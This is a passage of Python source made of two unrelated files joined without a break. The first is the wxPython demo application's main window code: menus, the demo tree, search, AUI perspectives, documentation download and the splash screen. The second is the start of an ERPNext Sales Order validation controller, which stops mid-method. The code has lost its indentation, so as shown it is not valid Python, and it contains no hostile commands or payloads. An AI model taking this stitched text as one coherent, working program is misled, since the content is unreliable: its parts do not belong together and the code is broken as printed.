self.Bind(wx.EVT_MENU, self.OnFileExit, exitItem)
self.mainmenu.Append(menu, '&File')
# Make a Demo menu
menu = wx.Menu()
for indx, item in enumerate(_treeList[:-1]):
menuItem = wx.MenuItem(menu, -1, item[0])
submenu = wx.Menu()
for childItem in item[1]:
mi = submenu.Append(-1, childItem)
self.Bind(wx.EVT_MENU, self.OnDemoMenu, mi)
menuItem.SetBitmap(images.catalog[_demoPngs[indx+1]].GetBitmap())
menuItem.SetSubMenu(submenu)
menu.Append(menuItem)
self.mainmenu.Append(menu, '&Demo')
# Make an Option menu
menu = wx.Menu()
item = wx.MenuItem(menu, -1, 'Allow download of docs', 'Docs for window styles and events from the web', wx.ITEM_CHECK)
menu.Append(item)
item.Check(self.allowDocs)
self.Bind(wx.EVT_MENU, self.OnAllowDownload, item)
item = wx.MenuItem(menu, -1, 'Delete saved docs', 'Deletes the cPickle file where docs are stored')
item.SetBitmap(images.catalog['deletedocs'].GetBitmap())
menu.Append(item)
self.Bind(wx.EVT_MENU, self.OnDeleteDocs, item)
menu.AppendSeparator()
item = wx.MenuItem(menu, -1, 'Allow floating panes', 'Allows the demo panes to be floated using wxAUI', wx.ITEM_CHECK)
menu.Append(item)
item.Check(self.allowAuiFloating)
self.Bind(wx.EVT_MENU, self.OnAllowAuiFloating, item)
auiPerspectives = list(self.auiConfigurations.keys())
auiPerspectives.sort()
perspectivesMenu = wx.Menu()
item = wx.MenuItem(perspectivesMenu, -1, DEFAULT_PERSPECTIVE, "Load startup default perspective", wx.ITEM_RADIO)
self.Bind(wx.EVT_MENU, self.OnAUIPerspectives, item)
perspectivesMenu.Append(item)
for indx, key in enumerate(auiPerspectives):
if key == DEFAULT_PERSPECTIVE:
continue
item = wx.MenuItem(perspectivesMenu, -1, key, "Load user perspective %d"%indx, wx.ITEM_RADIO)
perspectivesMenu.Append(item)
self.Bind(wx.EVT_MENU, self.OnAUIPerspectives, item)
menu.Append(wx.ID_ANY, "&AUI Perspectives", perspectivesMenu)
self.perspectives_menu = perspectivesMenu
item = wx.MenuItem(menu, -1, 'Save Perspective', 'Save AUI perspective')
item.SetBitmap(images.catalog['saveperspective'].GetBitmap())
menu.Append(item)
self.Bind(wx.EVT_MENU, self.OnSavePerspective, item)
item = wx.MenuItem(menu, -1, 'Delete Perspective', 'Delete AUI perspective')
item.SetBitmap(images.catalog['deleteperspective'].GetBitmap())
menu.Append(item)
self.Bind(wx.EVT_MENU, self.OnDeletePerspective, item)
menu.AppendSeparator()
item = wx.MenuItem(menu, -1, 'Restore Tree Expansion', 'Restore the initial tree expansion state')
item.SetBitmap(images.catalog['expansion'].GetBitmap())
menu.Append(item)
self.Bind(wx.EVT_MENU, self.OnTreeExpansion, item)
self.mainmenu.Append(menu, '&Options')
self.options_menu = menu
# Make a Help menu
menu = wx.Menu()
findItem = wx.MenuItem(menu, -1, '&Find\tCtrl-F', 'Find in the Demo Code')
findItem.SetBitmap(images.catalog['find'].GetBitmap())
if 'wxMac' not in wx.PlatformInfo:
findNextItem = wx.MenuItem(menu, -1, 'Find &Next\tF3', 'Find Next')
else:
findNextItem = wx.MenuItem(menu, -1, 'Find &Next\tCtrl-G', 'Find Next')
findNextItem.SetBitmap(images.catalog['findnext'].GetBitmap())
menu.Append(findItem)
menu.Append(findNextItem)
menu.AppendSeparator()
shellItem = wx.MenuItem(menu, -1, 'Open Py&Shell Window\tF5',
                                'An interactive interpreter window with the demo app and frame objects in the namespace')
shellItem.SetBitmap(images.catalog['pyshell'].GetBitmap())
menu.Append(shellItem)
inspToolItem = wx.MenuItem(menu, -1, 'Open &Widget Inspector\tF6',
'A tool that lets you browse the live widgets and sizers in an application')
inspToolItem.SetBitmap(images.catalog['inspect'].GetBitmap())
menu.Append(inspToolItem)
if 'wxMac' not in wx.PlatformInfo:
menu.AppendSeparator()
helpItem = menu.Append(wx.ID_ABOUT, '&About wxPython Demo', 'wxPython RULES!!!')
self.Bind(wx.EVT_MENU, self.OnOpenShellWindow, shellItem)
self.Bind(wx.EVT_MENU, self.OnOpenWidgetInspector, inspToolItem)
self.Bind(wx.EVT_MENU, self.OnHelpAbout, helpItem)
self.Bind(wx.EVT_MENU, self.OnHelpFind, findItem)
self.Bind(wx.EVT_MENU, self.OnFindNext, findNextItem)
self.Bind(wx.EVT_FIND, self.OnFind)
self.Bind(wx.EVT_FIND_NEXT, self.OnFind)
self.Bind(wx.EVT_FIND_CLOSE, self.OnFindClose)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateFindItems, findItem)
self.Bind(wx.EVT_UPDATE_UI, self.OnUpdateFindItems, findNextItem)
self.mainmenu.Append(menu, '&Help')
self.SetMenuBar(self.mainmenu)
self.EnableAUIMenu()
if False:
# This is another way to set Accelerators, in addition to
# using the '\t<key>' syntax in the menu items.
aTable = wx.AcceleratorTable([(wx.ACCEL_ALT, ord('X'), exitItem.GetId()),
(wx.ACCEL_CTRL, ord('H'), helpItem.GetId()),
(wx.ACCEL_CTRL, ord('F'), findItem.GetId()),
(wx.ACCEL_NORMAL, wx.WXK_F3, findNextItem.GetId()),
(wx.ACCEL_NORMAL, wx.WXK_F9, shellItem.GetId()),
])
self.SetAcceleratorTable(aTable)
#---------------------------------------------
def RecreateTree(self, evt=None):
# Catch the search type (name or content)
searchMenu = self.filter.GetMenu().GetMenuItems()
fullSearch = searchMenu[1].IsChecked()
if evt:
if fullSearch:
                # Do not scan all the demo files for every character the
                # user types; use wx.EVT_TEXT_ENTER instead
return
expansionState = self.tree.GetExpansionState()
current = None
item = self.tree.GetSelection()
if item:
prnt = self.tree.GetItemParent(item)
if prnt:
current = (self.tree.GetItemText(item),
self.tree.GetItemText(prnt))
self.tree.Freeze()
self.tree.DeleteAllItems()
self.root = self.tree.AddRoot("wxPython Overview")
self.tree.SetItemImage(self.root, 0)
self.tree.SetItemData(self.root, 0)
treeFont = self.tree.GetFont()
catFont = self.tree.GetFont()
# The native treectrl on MSW has a bug where it doesn't draw
# all of the text for an item if the font is larger than the
# default. It seems to be clipping the item's label as if it
# was the size of the same label in the default font.
if USE_CUSTOMTREECTRL or 'wxMSW' not in wx.PlatformInfo:
treeFont.SetPointSize(treeFont.GetPointSize()+2)
treeFont.SetWeight(wx.FONTWEIGHT_BOLD)
catFont.SetWeight(wx.FONTWEIGHT_BOLD)
self.tree.SetItemFont(self.root, treeFont)
firstChild = None
selectItem = None
filter = self.filter.GetValue()
count = 0
for category, items in _treeList:
count += 1
if filter:
if fullSearch:
items = self.searchItems[category]
else:
items = [item for item in items if filter.lower() in item.lower()]
if items:
child = self.tree.AppendItem(self.root, category, image=count)
self.tree.SetItemFont(child, catFont)
self.tree.SetItemData(child, count)
if not firstChild: firstChild = child
for childItem in items:
image = count
if DoesModifiedExist(childItem):
image = len(_demoPngs)
theDemo = self.tree.AppendItem(child, childItem, image=image)
self.tree.SetItemData(theDemo, count)
self.treeMap[childItem] = theDemo
if current and (childItem, category) == current:
selectItem = theDemo
self.tree.Expand(self.root)
if firstChild:
self.tree.Expand(firstChild)
if filter:
self.tree.ExpandAll()
elif expansionState:
self.tree.SetExpansionState(expansionState)
if selectItem:
self.skipLoad = True
self.tree.SelectItem(selectItem)
self.skipLoad = False
self.tree.Thaw()
self.searchItems = {}
def OnStatusBarSize(self, evt):
self.Reposition() # for normal size events
# Set a flag so the idle time handler will also do the repositioning.
# It is done this way to get around a buglet where GetFieldRect is not
# accurate during the EVT_SIZE resulting from a frame maximize.
self.sizeChanged = True
def OnStatusBarIdle(self, evt):
if self.sizeChanged:
self.Reposition()
# reposition the download gauge
def Reposition(self):
# rect = self.statusBar.GetFieldRect(1)
# self.downloadGauge.SetPosition((rect.x+2, rect.y+2))
# self.downloadGauge.SetSize((rect.width-4, rect.height-4))
self.sizeChanged = False
def OnSearchMenu(self, event):
# Catch the search type (name or content)
searchMenu = self.filter.GetMenu().GetMenuItems()
fullSearch = searchMenu[1].IsChecked()
if fullSearch:
self.OnSearch()
else:
self.RecreateTree()
def OnSearch(self, event=None):
value = self.filter.GetValue()
if not value:
self.RecreateTree()
return
wx.BeginBusyCursor()
for category, items in _treeList:
self.searchItems[category] = []
for childItem in items:
if SearchDemo(childItem, value):
self.searchItems[category].append(childItem)
wx.EndBusyCursor()
self.RecreateTree()
def SetTreeModified(self, modified):
item = self.tree.GetSelection()
if modified:
image = len(_demoPngs)
else:
image = self.tree.GetItemData(item)
self.tree.SetItemImage(item, image)
def WriteText(self, text):
if text[-1:] == '\n':
text = text[:-1]
wx.LogMessage(text)
def write(self, txt):
self.WriteText(txt)
#---------------------------------------------
def OnItemExpanded(self, event):
item = event.GetItem()
wx.LogMessage("OnItemExpanded: %s" % self.tree.GetItemText(item))
event.Skip()
#---------------------------------------------
def OnItemCollapsed(self, event):
item = event.GetItem()
wx.LogMessage("OnItemCollapsed: %s" % self.tree.GetItemText(item))
event.Skip()
#---------------------------------------------
def OnTreeLeftDown(self, event):
# reset the overview text if the tree item is clicked on again
pt = event.GetPosition()
item, flags = self.tree.HitTest(pt)
if item == self.tree.GetSelection():
self.SetOverview(self.tree.GetItemText(item)+" Overview", self.curOverview)
event.Skip()
#---------------------------------------------
def OnSelChanged(self, event):
if self.dying or not self.loaded or self.skipLoad:
return
self.StopDownload()
item = event.GetItem()
itemText = self.tree.GetItemText(item)
self.LoadDemo(itemText)
self.StartDownload()
#---------------------------------------------
def LoadDemo(self, demoName):
try:
wx.BeginBusyCursor()
self.pnl.Freeze()
os.chdir(self.cwd)
self.ShutdownDemoModule()
if demoName == self.overviewText:
# User selected the "wxPython Overview" node
# ie: _this_ module
# Changing the main window at runtime not yet supported...
self.demoModules = DemoModules(__name__)
self.SetOverview(self.overviewText, mainOverview)
self.LoadDemoSource()
self.UpdateNotebook(0)
else:
if os.path.exists(GetOriginalFilename(demoName)):
wx.LogMessage("Loading demo %s.py..." % demoName)
self.demoModules = DemoModules(demoName)
self.LoadDemoSource()
else:
package, overview = LookForExternals(self.externalDemos, demoName)
if package:
wx.LogMessage("Loading demo %s.py..." % ("%s/%s"%(package, demoName)))
self.demoModules = DemoModules("%s/%s"%(package, demoName))
self.LoadDemoSource()
elif overview:
self.SetOverview(demoName, overview)
self.codePage = None
self.UpdateNotebook(0)
else:
self.SetOverview("wxPython", mainOverview)
self.codePage = None
self.UpdateNotebook(0)
finally:
wx.EndBusyCursor()
self.pnl.Thaw()
#---------------------------------------------
def LoadDemoSource(self):
self.codePage = None
self.codePage = DemoCodePanel(self.nb, self)
self.codePage.LoadDemo(self.demoModules)
#---------------------------------------------
def RunModule(self):
"""Runs the active module"""
module = self.demoModules.GetActive()
self.ShutdownDemoModule()
overviewText = ""
# o The RunTest() for all samples must now return a window that can
        #   be placed in a tab in the main notebook.
# o If an error occurs (or has occurred before) an error tab is created.
if module is not None:
wx.LogMessage("Running demo module...")
if hasattr(module, "overview"):
overviewText = module.overview
try:
self.demoPage = module.runTest(self, self.nb, self)
except:
self.demoPage = DemoErrorPanel(self.nb, self.codePage,
DemoError(sys.exc_info()), self)
bg = self.nb.GetThemeBackgroundColour()
if bg:
self.demoPage.SetBackgroundColour(bg)
assert self.demoPage is not None, "runTest must return a window!"
else:
# There was a previous error in compiling or exec-ing
self.demoPage = DemoErrorPanel(self.nb, self.codePage,
self.demoModules.GetErrorInfo(), self)
self.SetOverview(self.demoModules.name + " Overview", overviewText)
if self.firstTime:
# change to the demo page the first time a module is run
self.UpdateNotebook(2)
self.firstTime = False
else:
# otherwise just stay on the same tab in case the user has changed to another one
self.UpdateNotebook()
#---------------------------------------------
def ShutdownDemoModule(self):
if self.demoPage:
# inform the window that it's time to quit if it cares
if hasattr(self.demoPage, "ShutdownDemo"):
self.demoPage.ShutdownDemo()
## wx.YieldIfNeeded() # in case the page has pending events
self.demoPage = None
#---------------------------------------------
def UpdateNotebook(self, select = -1):
nb = self.nb
debug = False
self.pnl.Freeze()
def UpdatePage(page, pageText):
pageExists = False
pagePos = -1
for i in range(nb.GetPageCount()):
if nb.GetPageText(i) == pageText:
pageExists = True
pagePos = i
break
if page:
if not pageExists:
# Add a new page
nb.AddPage(page, pageText, imageId=nb.GetPageCount())
if debug: wx.LogMessage("DBG: ADDED %s" % pageText)
else:
if nb.GetPage(pagePos) != page:
# Reload an existing page
nb.DeletePage(pagePos)
nb.InsertPage(pagePos, page, pageText, imageId=pagePos)
if debug: wx.LogMessage("DBG: RELOADED %s" % pageText)
else:
# Excellent! No redraw/flicker
if debug: wx.LogMessage("DBG: SAVED from reloading %s" % pageText)
elif pageExists:
# Delete a page
nb.DeletePage(pagePos)
if debug: wx.LogMessage("DBG: DELETED %s" % pageText)
else:
if debug: wx.LogMessage("DBG: STILL GONE - %s" % pageText)
if select == -1:
select = nb.GetSelection()
UpdatePage(self.codePage, "Demo Code")
UpdatePage(self.demoPage, "Demo")
if select >= 0 and select < nb.GetPageCount():
nb.SetSelection(select)
self.pnl.Thaw()
#---------------------------------------------
def SetOverview(self, name, text):
self.curOverview = text
lead = text[:6]
if lead != '<html>' and lead != '<HTML>':
text = '<br>'.join(text.split('\n'))
# if wx.USE_UNICODE:
# text = text.decode('iso8859_1')
self.ovr.SetPage(text)
self.nb.SetPageText(0, os.path.split(name)[1])
#---------------------------------------------
def StartDownload(self):
if self.downloading or not self.allowDocs:
return
item = self.tree.GetSelection()
if self.tree.ItemHasChildren(item):
return
itemText = self.tree.GetItemText(item)
if itemText in self.pickledData:
self.LoadDocumentation(self.pickledData[itemText])
return
text = self.curOverview
text += "<br><p><b>Checking for documentation on the wxWidgets website, please stand by...</b><br>"
lead = text[:6]
if lead != '<html>' and lead != '<HTML>':
text = '<br>'.join(text.split('\n'))
self.ovr.SetPage(text)
self.downloadTimer.Start(100)
self.downloadGauge.Show()
self.Reposition()
self.downloading = True
self.internetThread = InternetThread(self, itemText)
#---------------------------------------------
def StopDownload(self, error=None):
self.downloadTimer.Stop()
if not self.downloading:
return
if error:
if self.sendDownloadError:
self.log.AppendText("Warning: problems in downloading documentation from the wxWidgets website.\n")
self.log.AppendText("Error message from the documentation downloader was:\n")
self.log.AppendText("\n".join(error))
self.sendDownloadError = False
self.nb.SetPageImage(0, 0)
self.internetThread.keepRunning = False
self.internetThread = None
self.downloading = False
self.downloadGauge.Hide()
self.Reposition()
text = self.curOverview
lead = text[:6]
if lead != '<html>' and lead != '<HTML>':
text = '<br>'.join(text.split('\n'))
self.ovr.SetPage(text)
#---------------------------------------------
def LoadDocumentation(self, data):
text = self.curOverview
addHtml = False
if '<html>' not in text and '<HTML>' not in text:
text = '<br>'.join(text.split('\n'))
styles, events, extra, appearance = data
if appearance:
text += FormatImages(appearance)
for names, values in zip(["Styles", "Extra Styles", "Events"], [styles, extra, events]):
if not values:
continue
headers = (names == "Events" and [2] or [3])[0]
text += "<p>" + FormatDocs(names, values, headers)
item = self.tree.GetSelection()
itemText = self.tree.GetItemText(item)
self.pickledData[itemText] = data
if six.PY2:
# TODO: verify that this encoding is correct
text = text.decode('iso8859_1')
self.StopDownload()
self.ovr.SetPage(text)
#print("load time: ", time.time() - start)
# Menu methods
def OnFileExit(self, *event):
self.Close()
def OnToggleRedirect(self, event):
app = wx.GetApp()
if event.Checked():
app.RedirectStdio()
print("Print statements and other standard output will now be directed to this window.")
else:
app.RestoreStdio()
print("Print statements and other standard output will now be sent to the usual location.")
def OnAllowDownload(self, event):
self.allowDocs = event.IsChecked()
if self.allowDocs:
self.StartDownload()
else:
self.StopDownload()
def OnDeleteDocs(self, event):
deleteMsg = "You are about to delete the downloaded documentation.\n" + \
"Do you want to continue?"
dlg = wx.MessageDialog(self, deleteMsg, "wxPython Demo",
wx.YES_NO | wx.NO_DEFAULT| wx.ICON_QUESTION)
result = dlg.ShowModal()
if result == wx.ID_NO:
dlg.Destroy()
return
dlg.Destroy()
busy = wx.BusyInfo("Deleting downloaded data...")
wx.SafeYield()
pickledFile = GetDocFile()
docDir = os.path.split(pickledFile)[0]
if os.path.exists(docDir):
shutil.rmtree(docDir, ignore_errors=True)
self.pickledData = {}
del busy
self.sendDownloadError = True
def OnAllowAuiFloating(self, event):
self.allowAuiFloating = event.Checked()
for pane in self.mgr.GetAllPanes():
if pane.name != "Notebook":
pane.Floatable(self.allowAuiFloating)
self.EnableAUIMenu()
self.mgr.Update()
def EnableAUIMenu(self):
menuItems = self.options_menu.GetMenuItems()
for indx in range(4, len(menuItems)-1):
item = menuItems[indx]
item.Enable(self.allowAuiFloating)
def OnAUIPerspectives(self, event):
perspective = self.perspectives_menu.GetLabel(event.GetId())
self.mgr.LoadPerspective(self.auiConfigurations[perspective])
self.mgr.Update()
def OnSavePerspective(self, event):
dlg = wx.TextEntryDialog(self, "Enter a name for the new perspective:", "AUI Configuration")
dlg.SetValue(("Perspective %d")%(len(self.auiConfigurations)+1))
if dlg.ShowModal() != wx.ID_OK:
return
perspectiveName = dlg.GetValue()
menuItems = self.perspectives_menu.GetMenuItems()
for item in menuItems:
if item.GetLabel() == perspectiveName:
wx.MessageBox("The selected perspective name:\n\n%s\n\nAlready exists."%perspectiveName,
"Error", style=wx.ICON_ERROR)
return
item = wx.MenuItem(self.perspectives_menu, -1, dlg.GetValue(),
"Load user perspective %d"%(len(self.auiConfigurations)+1),
wx.ITEM_RADIO)
self.Bind(wx.EVT_MENU, self.OnAUIPerspectives, item)
self.perspectives_menu.Append(item)
item.Check(True)
self.auiConfigurations.update({dlg.GetValue(): self.mgr.SavePerspective()})
def OnDeletePerspective(self, event):
menuItems = self.perspectives_menu.GetMenuItems()
lst = []
loadDefault = False
for indx, item in enumerate(menuItems):
if indx > 0:
lst.append(item.GetLabel())
dlg = wx.MultiChoiceDialog(self,
"Please select the perspectives\nyou would like to delete:",
"Delete AUI Perspectives", lst)
if dlg.ShowModal() == wx.ID_OK:
selections = dlg.GetSelections()
strings = [lst[x] for x in selections]
for sel in strings:
self.auiConfigurations.pop(sel)
item = menuItems[lst.index(sel)+1]
if item.IsChecked():
loadDefault = True
self.perspectives_menu.GetMenuItems()[0].Check(True)
self.perspectives_menu.DeleteItem(item)
lst.remove(sel)
if loadDefault:
self.mgr.LoadPerspective(self.auiConfigurations[DEFAULT_PERSPECTIVE])
self.mgr.Update()
def OnTreeExpansion(self, event):
self.tree.SetExpansionState(self.expansionState)
def OnHelpAbout(self, event):
from About import MyAboutBox
about = MyAboutBox(self)
about.ShowModal()
about.Destroy()
def OnHelpFind(self, event):
if self.finddlg != None:
return
self.nb.SetSelection(1)
self.finddlg = wx.FindReplaceDialog(self, self.finddata, "Find",
wx.FR_NOMATCHCASE | wx.FR_NOWHOLEWORD)
self.finddlg.Show(True)
def OnUpdateFindItems(self, evt):
evt.Enable(self.finddlg == None)
def OnFind(self, event):
editor = self.codePage.editor
self.nb.SetSelection(1)
end = editor.GetLastPosition()
textstring = editor.GetRange(0, end).lower()
findstring = self.finddata.GetFindString().lower()
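        # Search relative to the current selection; on a miss, wrap around
        # once from the far end of the buffer before giving up.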
backward = not (self.finddata.GetFlags() & wx.FR_DOWN)
if backward:
start = editor.GetSelection()[0]
loc = textstring.rfind(findstring, 0, start)
else:
start = editor.GetSelection()[1]
loc = textstring.find(findstring, start)
if loc == -1 and start != 0:
# string not found, start at beginning
if backward:
start = end
loc = textstring.rfind(findstring, 0, start)
else:
start = 0
loc = textstring.find(findstring, start)
if loc == -1:
dlg = wx.MessageDialog(self, 'Find String Not Found',
'Find String Not Found in Demo File',
wx.OK | wx.ICON_INFORMATION)
dlg.ShowModal()
dlg.Destroy()
if self.finddlg:
if loc == -1:
self.finddlg.SetFocus()
return
else:
self.finddlg.Destroy()
self.finddlg = None
editor.ShowPosition(loc)
editor.SetSelection(loc, loc + len(findstring))
def OnFindNext(self, event):
if self.finddata.GetFindString():
self.OnFind(event)
else:
self.OnHelpFind(event)
def OnFindClose(self, event):
event.GetDialog().Destroy()
self.finddlg = None
def OnOpenShellWindow(self, evt):
if self.shell:
# if it already exists then just make sure it's visible
s = self.shell
if s.IsIconized():
s.Iconize(False)
s.Raise()
else:
# Make a PyShell window
from wx import py
namespace = { 'wx' : wx,
'app' : wx.GetApp(),
'frame' : self,
}
self.shell = py.shell.ShellFrame(None, locals=namespace)
self.shell.SetSize((640,480))
self.shell.Show()
# Hook the close event of the main frame window so that we
# close the shell at the same time if it still exists
def CloseShell(evt):
if self.shell:
self.shell.Close()
evt.Skip()
self.Bind(wx.EVT_CLOSE, CloseShell)
def OnOpenWidgetInspector(self, evt):
# Activate the widget inspection tool, giving it a widget to preselect
# in the tree. Use either the one under the cursor, if any, or this
# frame.
from wx.lib.inspection import InspectionTool
wnd = wx.FindWindowAtPointer()
if not wnd:
wnd = self
InspectionTool().Show(wnd, True)
#---------------------------------------------
def OnCloseWindow(self, event):
self.mgr.UnInit()
self.dying = True
self.demoPage = None
self.codePage = None
self.mainmenu = None
self.StopDownload()
if self.tbicon is not None:
self.tbicon.Destroy()
config = GetConfig()
config.Write('ExpansionState', str(self.tree.GetExpansionState()))
config.Write('AUIPerspectives', str(self.auiConfigurations))
config.Write('AllowDownloads', str(self.allowDocs))
config.Write('AllowAUIFloating', str(self.allowAuiFloating))
config.Flush()
MakeDocDirs()
pickledFile = GetDocFile()
fid = open(pickledFile, "wb")
cPickle.dump(self.pickledData, fid, cPickle.HIGHEST_PROTOCOL)
fid.close()
self.Destroy()
#---------------------------------------------
def OnIdle(self, event):
if self.otherWin:
self.otherWin.Raise()
self.demoPage = self.otherWin
self.otherWin = None
#---------------------------------------------
def OnDownloadTimer(self, event):
self.downloadGauge.Pulse()
self.downloadImage += 1
if self.downloadImage > 9:
self.downloadImage = 3
self.nb.SetPageImage(0, self.downloadImage)
## wx.SafeYield()
#---------------------------------------------
def ShowTip(self):
config = GetConfig()
showTipText = config.Read("tips")
if showTipText:
showTip, index = eval(showTipText)
else:
showTip, index = (1, 0)
# if showTip:
# tp = wx.CreateFileTipProvider(opj("data/tips.txt"), index)
# showTip = wx.ShowTip(self, tp)
# index = tp.GetCurrentTip()
# config.Write("tips", str( (showTip, index) ))
# config.Flush()
#---------------------------------------------
def OnDemoMenu(self, event):
try:
selectedDemo = self.treeMap[self.mainmenu.GetLabel(event.GetId())]
except:
selectedDemo = None
if selectedDemo:
self.tree.SelectItem(selectedDemo)
self.tree.EnsureVisible(selectedDemo)
#---------------------------------------------
    def OnIconify(self, evt):
        wx.LogMessage("OnIconify: %s" % evt.Iconized())
evt.Skip()
#---------------------------------------------
def OnMaximize(self, evt):
wx.LogMessage("OnMaximize")
evt.Skip()
#---------------------------------------------
def OnActivate(self, evt):
wx.LogMessage("OnActivate: %s" % evt.GetActive())
evt.Skip()
#---------------------------------------------
def OnAppActivate(self, evt):
wx.LogMessage("OnAppActivate: %s" % evt.GetActive())
evt.Skip()
#---------------------------------------------------------------------------
#---------------------------------------------------------------------------
class MySplashScreen(SplashScreen):
def __init__(self):
bmp = wx.Image(opj("bitmaps/splash.png")).ConvertToBitmap()
SplashScreen.__init__(self, bmp,
wx.adv.SPLASH_CENTRE_ON_SCREEN | wx.adv.SPLASH_TIMEOUT,
5000, None, -1)
self.Bind(wx.EVT_CLOSE, self.OnClose)
self.fc = wx.CallLater(2000, self.ShowMain)
def OnClose(self, evt):
# Make sure the default handler runs too so this window gets
# destroyed
evt.Skip()
self.Hide()
# if the timer is still running then go ahead and show the
# main frame now
if self.fc.IsRunning():
self.fc.Stop()
self.ShowMain()
def ShowMain(self):
frame = wxPythonDemo(None, "wxPython: (A Demonstration)")
frame.Show()
if self.fc.IsRunning():
self.Raise()
wx.CallAfter(frame.ShowTip)
#---------------------------------------------------------------------------
from wx.lib.mixins.treemixin import ExpansionState
if USE_CUSTOMTREECTRL:
import wx.lib.agw.customtreectrl as CT
TreeBaseClass = CT.CustomTreeCtrl
else:
TreeBaseClass = wx.TreeCtrl
class wxPythonDemoTree(ExpansionState, TreeBaseClass):
def __init__(self, parent):
TreeBaseClass.__init__(self, parent, style=wx.TR_DEFAULT_STYLE|
wx.TR_HAS_VARIABLE_ROW_HEIGHT)
self.BuildTreeImageList()
if USE_CUSTOMTREECTRL:
self.SetSpacing(10)
self.SetWindowStyle(self.GetWindowStyle() & ~wx.TR_LINES_AT_ROOT)
self.SetInitialSize((100,80))
def AppendItem(self, parent, text, image=-1, wnd=None):
if USE_CUSTOMTREECTRL:
item = TreeBaseClass.AppendItem(self, parent, text, image=image, wnd=wnd)
else:
item = TreeBaseClass.AppendItem(self, parent, text, image=image)
return item
def BuildTreeImageList(self):
imgList = wx.ImageList(16, 16)
for png in _demoPngs:
imgList.Add(images.catalog[png].GetBitmap())
# add the image for modified demos.
imgList.Add(images.catalog["custom"].GetBitmap())
self.AssignImageList(imgList)
def GetItemIdentity(self, item):
return self.GetItemData(item)
#---------------------------------------------------------------------------
class MyApp(wx.App, wx.lib.mixins.inspection.InspectionMixin):
def OnInit(self):
# Check runtime version
if LooseVersion(version.VERSION_STRING) != LooseVersion(wx.VERSION_STRING):
wx.MessageBox(caption="Warning",
message="You're using version %s of wxPython, but this copy of the demo was written for version %s.\n"
"There may be some version incompatibilities..."
% (wx.VERSION_STRING, version.VERSION_STRING))
self.InitInspection() # for the InspectionMixin base class
        # Now that we've warned the user about possible problems,
        # let's import images
import images as i
global images
images = i
# For debugging
#self.SetAssertMode(wx.PYAPP_ASSERT_DIALOG|wx.PYAPP_ASSERT_EXCEPTION)
wx.SystemOptions.SetOption("mac.window-plain-transition", 1)
self.SetAppName("wxPyDemo")
# Create and show the splash screen. It will then create and
# show the main frame when it is time to do so. Normally when
# using a SplashScreen you would create it, show it and then
# continue on with the application's initialization, finally
# creating and showing the main application window(s). In
# this case we have nothing else to do so we'll delay showing
# the main frame until later (see ShowMain above) so the users
# can see the SplashScreen effect.
splash = MySplashScreen()
splash.Show()
return True
#---------------------------------------------------------------------------
def main():
try:
demoPath = os.path.dirname(__file__)
os.chdir(demoPath)
except:
pass
app = MyApp(False)
app.MainLoop()
#---------------------------------------------------------------------------
mainOverview = """<html><body>
<h2>wxPython</h2>
<p> wxPython is a <b>GUI toolkit</b> for the Python programming
language. It allows Python programmers to create programs with a
robust, highly functional graphical user interface, simply and easily.
It is implemented as a Python extension module (native code) that
wraps the popular wxWindows cross platform GUI library, which is
written in C++.
<p> Like Python and wxWindows, wxPython is <b>Open Source</b> which
means that it is free for anyone to use and the source code is
available for anyone to look at and modify. Or anyone can contribute
fixes or enhancements to the project.
<p> wxPython is a <b>cross-platform</b> toolkit. This means that the
same program will run on multiple platforms without modification.
Currently supported platforms are 32-bit Microsoft Windows, most Unix
or unix-like systems, and Macintosh OS X. Since the language is
Python, wxPython programs are <b>simple, easy</b> to write and easy to
understand.
<p> <b>This demo</b> is not only a collection of test cases for
wxPython, but is also designed to help you learn about wxPython and
how to use it. Each sample is listed in the tree control on the left.
When a sample is selected in the tree, a module is loaded and run
(usually in a tab of this notebook), and the source code of the module
is loaded in another tab for you to browse and learn from.
"""
#----------------------------------------------------------------------------
#----------------------------------------------------------------------------
if __name__ == '__main__':
__name__ = 'Main'
main()
#----------------------------------------------------------------------------
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
import frappe.utils
from frappe.utils import cstr, flt, getdate, comma_and,cint
from frappe import _
from frappe.model.mapper import get_mapped_doc
from erpnext.controllers.selling_controller import SellingController
form_grid_templates = {
"sales_order_details": "templates/form_grid/item_grid.html"
}
class SalesOrder(SellingController):
tname = 'Sales Order Item'
fname = 'sales_order_details'
person_tname = 'Target Detail'
partner_tname = 'Partner Target Detail'
territory_tname = 'Territory Target Detail'
def validate_mandatory(self):
# validate transaction date v/s delivery date
if self.delivery_date:
if getdate(self.transaction_date) > getdate(self.delivery_date):
frappe.throw(_("Expected Delivery Date cannot be before Sales Order Date"))
def validate_po(self):
# validate p.o date v/s delivery date
if self.po_date and self.delivery_date and getdate(self.po_date) > getdate(self.delivery_date):
frappe.throw(_("Expected Delivery Date cannot be before Purchase Order Date"))
if self.po_no and self.customer:
so = frappe.db.sql("select name from `tabSales Order` \
where ifnull(po_no, '') = %s and name != %s and docstatus < 2\
and customer = %s", (self.po_no, self.name, self.customer))
if so and so[0][0]:
frappe.msgprint(_("Warning: Sales Order {0} already exists against same Purchase Order number").format(so[0][0]))
def validate_for_items(self):
check_list, flag = [], 0
chk_dupl_itm = []
for d in self.get('sales_order_details'):
e = [d.item_code, d.description, d.warehouse, d.prevdoc_docname or '']
f = [d.item_code, d.description]
if frappe.db.get_value("Item", d.item_code, "is_stock_item") == 'Yes':
if not d.warehouse:
frappe.throw(_("Reserved warehouse required for stock item {0}").format(d.item_code))
if e in check_list:
frappe.throw(_("Item {0} has been entered twice").format(d.item_code))
else:
check_list.append(e)
else:
if f in chk_dupl_itm:
frappe.throw(_("Item {0} has been entered twice").format(d.item_code))
else:
chk_dupl_itm.append(f)
# used for production plan
d.transaction_date = self.transaction_date
tot_avail_qty = frappe.db.sql("select projected_qty from `tabBin` \
where item_code = %s and warehouse = %s", (d.item_code,d.warehouse))
d.projected_qty = tot_avail_qty and flt(tot_avail_qty[0][0]) or 0
def validate_sales_mntc_quotation(self):
for d in self.get('sales_order_details'):
if d.prevdoc_docname:
res = frappe.db.sql("select name from `tabQuotation` where name=%s and order_type = %s", (d.prevdoc_docname, self.order_type))
if not res:
frappe.msgprint(_("Quotation {0} not of type {1}").format(d.prevdoc_docname, self.order_type))
def validate_order_type(self):
super(SalesOrder, self).validate_order_type()
def validate_delivery_date(self):
if self.order_type == 'Sales' and not self.delivery_date:
frappe.throw(_("Please enter 'Expected Delivery Date'"))
self.validate_sales_mntc_quotation()
def validate_proj_cust(self):
if self.project_name and self.customer_name:
